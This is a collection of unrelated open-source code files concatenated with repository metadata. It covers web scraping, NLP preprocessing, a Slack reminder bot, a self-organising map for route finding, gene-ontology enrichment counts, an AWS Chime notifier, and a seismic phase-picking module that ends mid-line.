f'/html/body/main/div[6]/section/div[2]/article/div[{num}]/div/div/table/tbody/tr[6]/td').text\n except:\n tempoJogo = None\n print(\"algo deu errado com tempo de jogo de \" + titulo)\n try:\n editora = driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[2]/article/div[{num}]/div/div/table/tbody/tr[1]/td').text\n except:\n editora = None\n print(\"algo deu errado com editora de \" + titulo)\n print(titulo, disponibilidade, numJogadores, idade, tempoJogo, editora, preco)\n jogos.append(Jogo(titulo, disponibilidade, numJogadores, idade, tempoJogo, editora, 'Play Easy', preco))\n driver.back()\n time.sleep(2)\n\n print(jogos)\n\n driver.close()\n","repo_name":"andersonzambeli/ine5238","sub_path":"Crawler.py","file_name":"Crawler.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21422423635","text":"import contractions\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\n\nclass TextProcessor:\n\n @staticmethod\n def preprocess_pipeline(df, col, stopwords):\n tp = TextProcessor\n df = df.copy() # to avoid some warnings (SettingWithCopyWarning)\n # is, ASAP !!!!\n df = tp.apply_contractions(df, col)\n # is, AS SOON AS POSSIBLE !!!!\n df = tp.remove_nonAlphanumeric(df, col)\n # is AS SOON AS POSSIBLE\n df = tp.to_lower(df, col)\n # is as soon as possible\n df = tp.apply_lemmatization(df, col)\n # be as soon as possible\n if not stopwords:\n df = tp.remove_stopwords(df, col)\n # soon possible\n df = tp.remove_extra_spaces(df, col)\n # soon possible\n return df\n\n\n @staticmethod\n def apply_contractions(df, col):\n df[col] = df[col].apply(contractions.fix)\n 
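# [Editor's sketch, not part of the dataset record above.] One-string
# walk-through of the cleaning order preprocess_pipeline() applies
# column-wise. Requires the nltk 'wordnet' and 'stopwords' corpora; the
# sample sentence is invented.
import re
import contractions
from nltk.stem import WordNetLemmatizer
from nltk.corpus import stopwords

text = contractions.fix("it'll be raining soon")    # expand contractions first
text = re.sub(r'[^a-zA-Z]', ' ', text).lower()      # keep letters only, lowercase
lemmatizer = WordNetLemmatizer()
words = [lemmatizer.lemmatize(w, pos='v') for w in text.split()]  # raining -> rain
words = [w for w in words if w not in stopwords.words('english')]
print(' '.join(words))                              # e.g. 'rain soon'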
return df\n\n @staticmethod\n def remove_nonAlphanumeric(df, col):\n df[col] = df[col].str.replace(r\"[^a-zA-Z]\", \" \", regex=True)\n return df\n\n @staticmethod\n def to_lower(df, col):\n df[col] = df[col].str.lower()\n return df\n\n @staticmethod\n def apply_lemmatization(df, col):\n wordnet_lemmatizer = WordNetLemmatizer()\n\n def lemmatize(field):\n tokens = field.split()\n lemmatized = [wordnet_lemmatizer.lemmatize(word, pos=\"v\") for word in tokens]\n return \" \".join(lemmatized)\n\n df[col] = df[col].apply(lemmatize)\n return df\n\n @staticmethod\n def remove_stopwords(df, col):\n stop_words = list(stopwords.words('english'))\n for stop_word in stop_words:\n pattern = r\"\\b\" + stop_word + r\"\\b\"\n df[col] = df[col].str.replace(pattern, '', regex=True)\n\n return df \n\n\n @staticmethod\n def remove_extra_spaces(df, col): \n df[col] = df[col].str.replace(r'\\s+', ' ', regex=True)\n return df","repo_name":"AmosChenZixuan/DS-A3-UserRequirementsClassification","sub_path":"utils/text_processor.py","file_name":"text_processor.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7906139247","text":"import datetime\nfrom collections import Counter\nfrom bs4 import BeautifulSoup\nimport os\nimport csv\n\n\n# extract all words from HTML and calculate the top 10 words\n# The Top 10 Words on each Page are stored in CSV wrt to each Web Page URL\nclass HTMLProcessor:\n url = ''\n page = ''\n\n # CSV File name using the date format\n date = datetime.datetime.now()\n csvfilename = ''\n\n def __init__(self, pageurl):\n self.url = pageurl\n\n #\n def __init__(self, pageurl, pagedoc, filename):\n self.url = pageurl\n self.page = pagedoc\n # csv file name initialized once\n self.csvfilename = 'web-{year}-{month}-{day}-{min}'.format(year=self.date.year, month=self.date.month,\n day=self.date.day,\n min=self.date.minute)\n\n # Word Frequency counter after crawling a web-page\n\n # Function defining the web-crawler,\n # which will fetch information from\n # a given website, and push the contents to\n # the second function clean_wordlist()'''\n def startcounting(self):\n\n # empty list to store the contents of\n # the website fetched from our web-crawler\n wordlist = []\n\n soup = BeautifulSoup(self.page, 'html.parser')\n\n # Text in given web-page get the words and add into an collection\n content = soup.find().getText()\n words = content.lower().split()\n\n for each_word in words:\n wordlist.append(each_word)\n self.clean_wordlist(wordlist)\n\n # Function removes any unwanted symbols\n def clean_wordlist(self, wordlist):\n\n clean_list = []\n for word in wordlist:\n symbols = '!@#$%^&*()_-+={[}]|\\;:\"<>?/., '\n\n for i in range(0, len(symbols)):\n word = word.replace(symbols[i], '')\n\n if len(word) > 0:\n clean_list.append(word)\n self.create_dictionary(clean_list)\n\n # Creates a dictionary containing each word's\n\n # count and top_20 words and store with URL\n def create_dictionary(self, clean_list):\n word_count = {}\n word_count2 = {}\n\n for word in clean_list:\n if word in word_count:\n word_count[word] += 1\n else:\n word_count[word] = 1\n\n count = 0\n\n for word2 in clean_list:\n word2 = self.listToString(clean_list[count:count + 2])\n if word2 in word_count2:\n word_count2[word2] += 1\n else:\n word_count2[word2] = 1\n count += 1\n\n ''' To get the count of each word in \n the crawled page --> \n <-- '''\n\n c = Counter(word_count)\n c2 = Counter(word_count2)\n\n # returns the most 
occurring elements\n top = c.most_common(10)\n top2 = c2.most_common(10)\n self.fileWriter(top)\n self.fileWriter(top2)\n\n # To convert a list to string\n # Function to convert\n def listToString(self, s):\n # initialize an empty string\n str1 = \"\"\n\n # traverse in the string\n for ele in s:\n str1 += ele\n\n # return string\n return str1\n\n # Writing the data to csv file\n def fileWriter(self, inputString):\n cwd = os.getcwd()\n with open(f\"{cwd}/{self.csvfilename}.csv\", 'a') as out_file:\n writer = csv.writer(out_file)\n writer.writerow([self.url, inputString])\n","repo_name":"SSaxena/WebCrawler","sub_path":"src/HTMLProcessor.py","file_name":"HTMLProcessor.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15305869434","text":"import json\n\nimport logging\nfrom slack_sdk import WebClient\n\nfrom dinner_optimizer_shared import credentials_handler as creds\nfrom dinner_optimizer_shared import message_persistence as persistence\nfrom dinner_optimizer_shared import time_utils\n\nfrom dinner_optimizer_shared.interaction import Interaction\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nconsoleHandler = logging.StreamHandler()\nlogger.addHandler(consoleHandler)\n\n\ndef lambda_handler(event, context):\n logger.info(json.dumps(event))\n\n channel_id = event[\"slack_channel_id\"]\n\n credentials = creds.fetch_creds_from_secrets_manager()\n\n slack_client = WebClient(token=credentials[\"SLACK_BOT_TOKEN\"])\n\n past_recommendations: list[Interaction] = []\n for n in reversed(range(2, 5)):\n w = time_utils.nth_most_recent_saturday(n)\n past_interactions = persistence.retrieve_interactions_for_week(w, channel_id)\n\n # Add them to the current week's history.\n bot_messages = list(filter(lambda x: x.role == \"assistant\", past_interactions))\n if len(bot_messages) < 1:\n continue\n\n past_recommendations.append(bot_messages[-1])\n\n for pr in past_recommendations:\n persistence.record_conversation_message(\n pr, time_utils.most_recent_saturday(), channel_id\n )\n\n slack_client.chat_postMessage(\n channel=channel_id,\n text=\"*It's time to meal plan soon!*\\n\\nPost before 2pm with any special requests you might have this week, and I'll include them.\",\n )\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({\"success\": True}),\n }\n\n\ndef cli():\n event = {\n # Beta\n \"slack_channel_id\": \"C060L3A1J4W\"\n }\n lambda_handler(event, None)\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"mungewrath/dinner-optimizer","sub_path":"upcoming_reminder/src/upcoming_reminder/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15050120376","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.spatial.distance import euclidean\r\n\r\n\r\n\"\"\"\r\n GLOBAL VARIABLES DO NOT TOUCH!\r\n the code will be cursed if you touch anything - maybe don't even look at the code...\r\n\"\"\"\r\nspecies = 32\r\nattributes = 2\r\nn = 10\r\nsigma = 1\r\n\r\n\r\ndef read_data_cities(cities):\r\n \"\"\"\r\n Func read_data_cities/1\r\n @spec read_data_cities(string) :: np.array()\r\n Takes the file path and reads the file - returns the parsed file as an input array for our Neural Network\r\n \"\"\"\r\n f = open(cities, \"r\")\r\n city_map = []\r\n for line in f:\r\n city_map.append(line.split(\"\\n\")[0].split(\",\"))\r\n training = 
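# [Editor's sketch, not part of the dataset record above.] create_dictionary()
# above also counts word pairs, but listToString() concatenates them with no
# separator, so a pair like ('of', 'the') is stored as 'ofthe'. Idiomatic
# bigram counting keeps the pair readable; the word list is invented.
from collections import Counter

words = ['the', 'cat', 'sat', 'on', 'the', 'mat']
bigrams = Counter(zip(words, words[1:]))
print(bigrams.most_common(2))  # e.g. [(('the', 'cat'), 1), (('cat', 'sat'), 1)]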
np.asfarray(np.array(city_map), float)\r\n return training\r\n\r\n\r\ndef find_closest(animal, W, num_neighbour, grannar=True, eta=0.2):\r\n \"\"\"\r\n Func find_closest/5\r\n @spec find_closest(np.array(), np.array(), integer, boolean, integer) :: np.array()\r\n Given a data-sample 'animal', a weight matrix 'W', an integer of how many neighbours should be used\r\n -> update the weight matrix W based on the number of neighbours.\r\n \"\"\"\r\n dist = np.zeros(n)\r\n for i, w in enumerate(W):\r\n dist[i] = np.linalg.norm(animal-w)\r\n\r\n if not grannar:\r\n return np.argmin(dist)\r\n\r\n for index in range(num_neighbour):\r\n tmp_index = 0\r\n if np.argmin(dist) + index > len(W) - 1:\r\n tmp_index = np.argmin(dist) + index - len(W)\r\n W[tmp_index] += eta * (animal - W[tmp_index])\r\n if np.argmin(dist) - index < 0:\r\n tmp_index = np.argmin(dist) - index + len(W) - 1\r\n W[tmp_index] += eta * (animal - W[tmp_index])\r\n else:\r\n W[np.argmin(dist) - index] += eta * (animal - W[np.argmin(dist) - index])\r\n else:\r\n W[np.argmin(dist) + index] += eta * (animal - W[np.argmin(dist) + index])\r\n if np.argmin(dist) - index < 0:\r\n tmp_index = np.argmin(dist) - index + len(W) - 1\r\n W[tmp_index] += eta * (animal - W[tmp_index])\r\n else:\r\n W[np.argmin(dist) - index] += eta * (animal - W[np.argmin(dist) - index])\r\n return W\r\n\r\n\r\ndef save_the_animals(input, epoch=20):\r\n \"\"\"\r\n Func save_the_animals/2\r\n @spec save_the_animals(list, integer) :: void\r\n Find the correct solution to the given minimization problem.\r\n Currently finds a short (maybe shortest) path for the Travel Sales Person problem\r\n which is known to be unsolvable in polynomial time complexity.\r\n \"\"\"\r\n w = np.random.rand(2, n)\r\n w = w.T\r\n # Update W\r\n for e in range(epoch):\r\n for animal in input:\r\n # This neighboy variable is the solution to everything - don't ever question why we use this formula.\r\n # The formula to calculate the number of neighbours came to me in a dream - and it is our highest truth.\r\n neighboy = round((n - e)/2)\r\n w = find_closest(animal, w, neighboy)\r\n # Route array used for storing argmin of weight vector rows\r\n pos = np.zeros(n)\r\n for i in range(n):\r\n # Just something big\r\n distance = np.zeros(n)\r\n # Pick out the data point\r\n data_point_x = input[i, :]\r\n for j in range(n):\r\n # Calculate the the distance from the point x to all weights of row j in W\r\n distance[j] = euclidean(data_point_x, w[j, :])\r\n pos[i] = np.argmin(distance)\r\n # Now we have the route\r\n ordered = np.argsort(pos)\r\n # Add the starting position as last position in the route - since we are doing a cycle\r\n ordered = np.append(ordered, ordered[0])\r\n print(f\"The ordered route looks like this:\\n |-> {ordered}\")\r\n plt.title(\"Cyclic route\")\r\n plt.scatter(input[ordered][:, 0], input[ordered][:, 1])\r\n plt.plot(input[ordered][:, 0], input[ordered][:, 1])\r\n plt.show()\r\n\r\n\r\ndef main():\r\n print(\"### -- In main cyclic.py -- ###\")\r\n city_input = read_data_cities(\".\\\\datasets\\\\cities.dat\")\r\n save_the_animals(city_input)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"wilhelmagren/DD2437-Artificial-Neural-Networks-and-Deep-Architectures","sub_path":"Lab2/cyclic.py","file_name":"cyclic.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7025083544","text":"import sys, os\n#python cluster_enrichment_031814_2.py clusterfile 
Go-annotfile outputfile\ncluster_result = sys.argv[1] #contains gene: cluster\ngo_annot = open(sys.argv[2], 'r') #contains GO term: gene or pathway info- gene:pathway\n#genenum= int(sys.argv[3]) #number of genes in total for A. thaliana this is 27511\n\n\n### make gene and cluster dictionary\ncluster_result_open = open(cluster_result, 'r')\nline = cluster_result_open.readline()\nline = cluster_result_open.readline()\nexpre_gen =[]\ndict_cluster = {}\n\n#make dictionary with cluster as key and genes as items for each cluster:\nwhile line:\n info = line.strip().replace('\"','').split('\\t')\n gene = info[0]\n cluster = info[1]\n expre_gen.append(gene)\n if cluster in dict_cluster:\n dict_cluster[cluster].append(gene)\n else:\n dict_cluster[cluster] = [gene]\n line = cluster_result_open.readline()\n\nprint (dict_cluster)\n#AraCyc ### make gene and go-term dictionary\ngenler_list = []\npathway = [] #GO term list\n\ndef add_go_to_dict(go_annot, dict):\n for line in go_annot:\n info = line.strip().split(\"\\t\")\n gene = info[0] # gene ID\n #if gene.startswith(\"AT\"):\n pathway = info[1] # GO term\n x = info[2].strip().split(' ')\n function_str = \"_\".join(x)\n path_list= [pathway, function_str]\n path = \".\".join(path_list)\n if gene in expre_gen:\n if gene not in genler_list:\n genler_list.append(gene)\n #for GO in pathway:\n if path in dict:\n if gene not in dict[path]:\n dict[path].append(gene)\n else:\n dict[path] = [gene]\n \ndict = {} #dictionary should be GOterm:genes \nadd_go_to_dict(go_annot, dict)\nprint (dict)\n\n## make table for enrichment comparing clusters and GO terms, how many clusters represent 'x' GO term?\noutput_table = open('tableforEnrichment_%s' % cluster_result, 'w') # output is GOterm_cluster#, inclust-inGO, inclust-notGO, notclust-inGO, notclust-notGO\ngenenum= len(genler_list) #to compare just genes in your genelist (not all genes), use this genenumber\nfor item in dict:\n #item:GO-ID\n gene_list_for_go = dict[item]\n #print gene_list_for_go\n for i in dict_cluster.keys():\n cluster_list = dict_cluster[i]\n \n count1 = 0\n count2 = 0\n count3 = 0\n count4 = 0\n for j in cluster_list:\n if j in gene_list_for_go:\n count1 = count1 + 1\n else:\n count2 = count2 + 1\n count3 = len(gene_list_for_go) - count1\n count4 = genenum - (count1 + count2 + count3) #number is based on the # of genes from cluster file- in this case 20998\n output_table.write('%s|%s\\t%i\\t%i\\t%i\\t%i\\n' % (item, i, count1, count2, count3, count4))\noutput_table.close()\n#print gene_list_for_go","repo_name":"ShiuLab/GO-term-enrichment","sub_path":"cluster_enrichment_final_Sl.py","file_name":"cluster_enrichment_final_Sl.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"20777869951","text":"import pyproj\n\nimport pandas as pd\n\nfrom pvgrip.ssdp.utils \\\n import timestr2utc_time\n\nfrom pvgrip.utils.epsg \\\n import ll2epsg\n\n\ndef write_locations(route, ghi_default, dhi_default, time_default,\n azimuth_default, zenith_default, offset_default,\n locations_fn, epsg):\n with open(locations_fn, 'w') as f:\n for x in route:\n if 'longitude' not in x or 'latitude' not in x:\n raise RuntimeError\\\n (\"longitude or latitude is missing!\")\n\n lat_met, lon_met = \\\n ll2epsg(lat = x['latitude'], lon = x['longitude'], epsg = epsg)\n\n if 'dhi' not in x:\n x['dhi'] = dhi_default\n\n if 'ghi' not in x:\n x['ghi'] = ghi_default\n\n if 'azimuth' not in x:\n x['azimuth'] = azimuth_default\n\n if 
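# [Editor's sketch, not part of the dataset record above.] The enrichment
# script above only writes the 2x2 contingency counts per (GO term, cluster)
# pair. A downstream test such as Fisher's exact test would consume one such
# row like this; the counts are invented.
from scipy.stats import fisher_exact

count1, count2, count3, count4 = 12, 88, 30, 870
odds_ratio, p_value = fisher_exact([[count1, count2],
                                    [count3, count4]], alternative='greater')
print(odds_ratio, p_value)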
'zenith' not in x:\n x['zenith'] = zenith_default\n\n if 'offset' not in x:\n x['offset'] = offset_default\n\n if 'timestr' not in x:\n x['utc_time'] = timestr2utc_time(time_default)\n else:\n x['utc_time'] = timestr2utc_time(x['timestr'])\n\n fmt = '\\t'.join(('%.12f',)*7 + ('%d\\n',))\n\n f.write(fmt %(lat_met, lon_met,\n x['ghi'],x['dhi'],\n x['azimuth'],x['zenith'],x['offset'],\n x['utc_time']))\n\n return route\n\n\ndef write_result(route, ssdp_ofn, ofn):\n df_a = pd.DataFrame(route)\n df_b = pd.read_csv(ssdp_ofn, header=None)\n df_b.columns = ['POA']\n df_c = pd.concat([df_a.reset_index(drop=True), df_b], axis=1)\n return df_c.to_csv(ofn, sep='\\t', index=False)\n","repo_name":"esovetkin/pvgrip","sub_path":"pvgrip/route/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29933400617","text":"\ndef possible_path(lst):\n ok = True\n dict = {\"1\":[2],\"2\":[1,\"H\"],\"3\":[4],\"4\":[3,\"H\"],\"H\":[2,4]}\n for i in range(len(lst)-1):\n possiblePath = dict[str(lst[i])]\n if lst[i+1] not in possiblePath:\n ok = False\n return ok\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"FLgJEC8SK2AJYLC6y_21.py","file_name":"FLgJEC8SK2AJYLC6y_21.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35801528115","text":"\"\"\"Chime Message/Notification module.\"\"\"\n\n\nimport json\nimport logging\nfrom typing import Any, Optional\nfrom urllib.error import HTTPError, URLError\nfrom urllib.request import Request, urlopen\n\n_logger: logging.Logger = logging.getLogger(__name__)\n\n\ndef post_message(webhook: str, message: str) -> Optional[Any]:\n \"\"\"Send message on an existing Chime Chat rooms.\n\n Parameters\n ----------\n :param webhook : webhook\n Webhook: This contains all the authentication information to send the message\n :param message : message\n The actual message which needs to be posted on Slack channel\n\n Returns\n -------\n dict\n Represents the response from Chime\n \"\"\"\n response = None\n chime_message = {\"Content\": f\"Message: {message}\"}\n req = Request(webhook, json.dumps(chime_message).encode(\"utf-8\"))\n try:\n response = urlopen(req) # pylint: disable=R1732\n _logger.info(\"Message posted on Chime. 
Got respone as %s\", response.read())\n except HTTPError as e:\n _logger.exception(\"Request failed: %d %s\", e.code, e.reason)\n except URLError as e:\n _logger.exception(\"Server connection failed: %s\", e.reason)\n return response\n","repo_name":"aws/aws-sdk-pandas","sub_path":"awswrangler/chime.py","file_name":"chime.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":3653,"dataset":"github-code","pt":"32"} +{"seq_id":"27329023407","text":"import obspy\r\nfrom obspy import imaging\r\nimport numpy as np\r\nimport os\r\nfrom glob import glob\r\nimport matplotlib.pyplot as plt\r\nfrom multiprocessing import Process, Manager\r\nfrom time import ctime\r\nimport math\r\nfrom numba import jit\r\nfrom ..mathTool.mathFunc_bak import getDetec, prob2color\r\nfrom ..io import tool\r\nfrom ..io.seism import getTrace3ByFileName,Quake,QuakeL,Record,QuakeCC,RecordCC,t0,t1\r\nfrom ..io.sacTool import staTimeMat\r\n\r\nfrom ..mapTool.mapTool import plotTopo,faultL\r\nimport mpl_toolkits.basemap as basemap\r\nimport torch\r\nfrom obspy import taup\r\ntaupModel=taup.TauPyModel(model='iasp91')\r\nmaxA=2e19\r\nos.environ[\"MKL_NUM_THREADS\"] = \"32\"\r\n@jit\r\ndef isZeros(a):\r\n new = a.reshape([-1,10,a.shape[-1]])\r\n if (new.std(axis=(1))==0).sum()>5:\r\n return True\r\n return False\r\n\r\n\r\n'''\r\n@jit\r\ndef predictLongData(model, x, N=2000, indexL=range(750, 1250)):\r\n if len(x) == 0:\r\n return np.zeros(0)\r\n N = x.shape[0]\r\n Y = np.zeros(N)\r\n perN = len(indexL)\r\n loopN = int(math.ceil(N/perN))\r\n perLoop = int(1000)\r\n inMat = np.zeros((perLoop, 2000, 1, 3))\r\n #print(len(x))\r\n zeroCount=0\r\n for loop0 in range(0, int(loopN), int(perLoop)):\r\n loop1 = min(loop0+perLoop, loopN)\r\n for loop in range(loop0, loop1):\r\n i = loop*perN\r\n sIndex = min(max(0, i), N-2000)\r\n if sIndex > 0:\r\n inMat[loop-loop0, :, :, :] = processX(x[sIndex: sIndex+2000, :])\\\r\n .reshape([2000, 1, 3])\r\n outMat = (model.predict(inMat)[:,:,:,:1]).reshape([-1, 2000])\r\n for loop in range(loop0, loop1):\r\n i = loop*perN\r\n if isZeros(inMat[loop-loop0, :, :, :]):\r\n zeroCount+=1\r\n continue\r\n sIndex = min(max(0, i), N-2000)\r\n if sIndex > 0:\r\n Y[indexL0[0]+sIndex: indexL0[-1]+1+sIndex] = \\\r\n np.append(Y[indexL0[0]+sIndex: indexL0[-1]+1+sIndex],\\\r\n outMat[loop-loop0, indexL0].reshape([-1])\\\r\n ).reshape([2,-1]).max(axis=0)\r\n if zeroCount>0:\r\n print('zeros: %d'%zeroCount)\r\n \r\n return Y\r\n'''\r\nindexL0=range(275, 1500)\r\n@jit\r\ndef predictLongData(model, x, N=2000, indexL=range(750, 1250),dIndex=2000,dec=1):\r\n L = x.shape[0]\r\n if L <=dIndex*3:\r\n return np.zeros(L)\r\n validD = len(indexL)\r\n loop = math.ceil(dIndex/validD)\r\n zerosCount=0\r\n out = np.zeros([loop,L],np.float32)\r\n for i in range(loop):\r\n i0=validD*i\r\n i1=int((L-i0)/dIndex)*dIndex+i0\r\n X = x[i0:i1].reshape([-1,dIndex,1,3])\r\n XSTD = X.reshape([X.shape[0],-1,10,3]).std(axis=2,keepdims=True)\r\n sum0 = (XSTD==0).sum(axis=(1,2,3))\r\n X/=X.std(axis=(1,2,3),keepdims=True)+np.finfo(x.dtype).eps\r\n Y = model.predict(X)\r\n zerosCount+=(sum0>5).sum()\r\n Y[sum0>5]*=0\r\n Y[:, :indexL0[ 0] ]*=0\r\n Y[:, indexL0[-1]:]*=0\r\n out[i,i0:i1]=Y.reshape([-1])\r\n if zerosCount>0:\r\n print('zeros: %d'%zerosCount) \r\n return out.max(axis=0) \r\n'''\r\n@jit\r\ndef processX(X, rmean=True, normlize=True, reshape=True):\r\n if reshape:\r\n X = X.reshape(-1, 2000, 1, 3)\r\n if rmean:\r\n X = X - X.mean(axis=(1, 2)).reshape([-1, 1, 1, 3])\r\n if normlize:\r\n X 
= X/(X.std(axis=(1, 2, 3)).reshape([-1, 1, 1, 1]))\r\n return X\r\n'''\r\n@jit\r\ndef processX(X, rmean=True, normlize=False, reshape=True,isNoise=False,num=2000):\r\n if reshape:\r\n X = X.reshape(-1, num, 1, 3)\r\n #print(X.shape)\r\n if rmean:\r\n X-= X.mean(axis=1,keepdims=True)\r\n if normlize:\r\n X /=(X.std(axis=(1, 2, 3),keepdims=True))\r\n if isNoise:\r\n X+=(np.random.rand(X.shape[0],num,1,3)-0.5)*np.random.rand(X.shape[0],1,1,3)*X.max(axis=(1,2,3),keepdims=True)*0.15*(np.random.rand(X.shape[0],1,1,1)<0.1)\r\n return X\r\n\r\n\r\n\r\ndef originFileName(net, station, comp, YmdHMSJ, dirL=['data/']):\r\n #dir='tmpSacFile/'\r\n sacFileNames = list()\r\n Y = YmdHMSJ\r\n for dir in dirL:\r\n sacFileNamesStr = dir+net+'.'+station+'.'+Y['Y']+Y['j']+\\\r\n '*'+comp\r\n for file in glob(sacFileNamesStr):\r\n sacFileNames.append(file)\r\n return sacFileNames\r\n\r\nclass sta(object):\r\n def __init__(self, station, day,freq=[-1, -1], \\\r\n taupM=tool.quickTaupModel(),delta0=0.02,\\\r\n R=[-91,91,-181,181]):\r\n self.net = station['net']\r\n self.loc = station.loc()\r\n self.station = station['sta']\r\n self.sta = station\r\n self.day = day\r\n self.taupM=taupM\r\n if self.loc[0]R[1] \\\r\n or self.loc[1]R[3]:\r\n self.data=getTrace3ByFileName([[],[],[]], freq=freq,delta0=delta0,\\\r\n maxA=maxA,isData=False)\r\n print('skip')\r\n else:\r\n self.data = getTrace3ByFileName(station.getFileNames(self.day),\\\r\n freq=freq,delta0=delta0,\\\r\n maxA=maxA,isData=False)\r\n print(self.station,self.data.bTime,self.data.eTime)\r\n def __del__(self):\r\n try:\r\n del(self.data)\r\n torch.cuda.empty_cache()\r\n except:\r\n pass\r\n else:\r\n pass\r\n def predict(self,modelL=None, staTimeM=None,\\\r\n mode='mid', isClearData=False,maxD=80,decPre=1,maxDTime=2):\r\n self.timeL = list()\r\n self.vL = list()\r\n self.mode = mode\r\n indexLL = [range(275, 1700), range(275, 1700)]\r\n if mode=='norm':\r\n minValueL=[0.5,0.5]\r\n if mode=='high':\r\n minValueL=[0.4, 0.4]\r\n if mode=='mid':\r\n minValueL=[0.25, 0.25]\r\n if mode=='low':\r\n minValueL=[0.2, 0.2]\r\n if mode=='higher':\r\n minValueL=[0.6, 0.6]\r\n minDeltaL=[500, 750]\r\n for i in range(len(modelL)):\r\n y = predictLongData(modelL[i], self.data.Data(),\\\r\n indexL=indexLL[i],dec=decPre)\r\n #print(y.max(),y.std(),len(y))\r\n tmpL = getDetec(y, minValue=minValueL[i], minDelta =\\\r\n minDeltaL[i])\r\n print(ctime(),'find',len(tmpL[0]))\r\n self.timeL.append(tmpL[0])\r\n self.vL.append(tmpL[1])\r\n self.pairD = self.getPSPair(maxD=maxD)\r\n self.isPick = np.zeros(len(self.pairD))\r\n self.orignM = self.convertPS2orignM(staTimeM,maxD=maxD,maxDTime=maxDTime)\r\n if isClearData:\r\n self.clearData()\r\n\r\n def __repr__(self):\r\n reprStr=self.net + ' '+self.station+\\\r\n str(self.loc)\r\n return 'detec in station '+ reprStr\r\n\r\n\r\n def getSacFileNamesL(self, station):\r\n return station.getFileNames(self.day)\r\n\r\n def clearData(self):\r\n self.data.data = np.zeros((0, 3))\r\n\r\n def plotData(self):\r\n colorStr = ['.r', '.g']\r\n plt.plot(self.data.data[:,2]/self.data.data[:,2].max()\\\r\n + np.array(0))\r\n for i in range(len(self.timeL)):\r\n plt.plot(self.timeL[i],self.vL[i], colorStr[i])\r\n plt.show()\r\n\r\n def calOrign(self, pTime, sTime):\r\n return self.taupM.get_orign_times(pTime, sTime, self.data.delta)\r\n\r\n def getPSPair(self, maxD=80):\r\n pairD = list()\r\n if len(self.timeL) == 0:\r\n return pairD\r\n if self.data.delta<=0:\r\n return pairD\r\n maxN = maxD/self.data.delta\r\n pN=len(self.timeL[0])\r\n 
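        # A worked note on the pairing window, assuming the defaults used
        # elsewhere in this module: maxN converts the maximum P-to-S
        # separation maxD from seconds into samples, so with maxD=80 s and
        # delta0=0.02 s it is 80 / 0.02 = 4000 samples; an S pick arriving
        # more than maxN samples after a P pick is never paired with it.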
sN=len(self.timeL[1])\r\n j0=0\r\n for i in range(pN):\r\n pTime = self.timeL[0][i]\r\n if i < pN-1 and self.mode != 'low':\r\n pTimeNext = self.timeL[0][i+1]\r\n else:\r\n pTimeNext= self.timeL[0][i]+maxN\r\n pTimeNext = min(pTime+maxN, pTimeNext)\r\n isS = 0\r\n for j in range(j0, sN):\r\n if isS==0:\r\n j0=j\r\n if self.timeL[1][j] > pTime and self.timeL[1][j] < pTimeNext:\r\n sTime=self.timeL[1][j]\r\n #print(pTime, sTime)\r\n pairD.append([pTime*self.data.delta, sTime*self.data.delta\\\r\n , self.calOrign(pTime, sTime)*self.data.delta, \\\r\n (sTime-pTime)*self.data.delta, i, j])\r\n isS=1\r\n if self.timeL[1][j] >= pTimeNext:\r\n break\r\n return pairD\r\n\r\n def convertPS2orignM(self, staTimeM, maxDTime=2,maxD=100):\r\n laN = staTimeM.minTimeD.shape[0]\r\n loN = staTimeM.minTimeD.shape[1]\r\n orignM = [[list() for j in range(loN)] for i in range(laN)]\r\n if len(self.pairD)==0:\r\n return orignM\r\n bSec = self.data.bTime.timestamp\r\n timeL = np.zeros(len(self.pairD))\r\n for i in range(len(self.pairD)):\r\n timeL[i] = self.pairD[i][2]+bSec\r\n sortL = np.argsort(timeL)\r\n for laIndex in range(laN):\r\n for loIndex in range(loN):\r\n minPairTime=staTimeM.minTimeD[laIndex][loIndex] - maxDTime\r\n if minPairTime>maxD:\r\n continue\r\n maxPairTime=staTimeM.maxTimeD[laIndex][loIndex] + maxDTime\r\n for i in sortL:\r\n if self.pairD[i][3] >= minPairTime \\\r\n and self.pairD[i][3] <= maxPairTime:\r\n pTime = self.pairD[i][0]+bSec\r\n sTime = self.pairD[i][1]+bSec\r\n timeTmp = [pTime, sTime, timeL[i], i]\r\n orignM[laIndex][loIndex].append(timeTmp)\r\n return orignM\r\n def filt(self,f=[-1,-1],filtOrder=2):\r\n self.data.filt(f,filtOrder)\r\n return self\r\n def resample(self,resampleN):\r\n self.data.resample(resampleN)\r\n return self\r\n def pickQuake(self,quake,modelL,bSec=-10,eSec=10,bCount=-3000,eCount=3000):\r\n deg = quake.dist(self.sta)/111.19\r\n dep = self.sta['dep']/1000+quake['dep']\r\n timeL=[0,0]\r\n proL=[-1,-1]\r\n pTime0= self.getEarliest(taupModel.get_travel_times(dep, deg, \\\r\n ['p', 'P', 'PP', 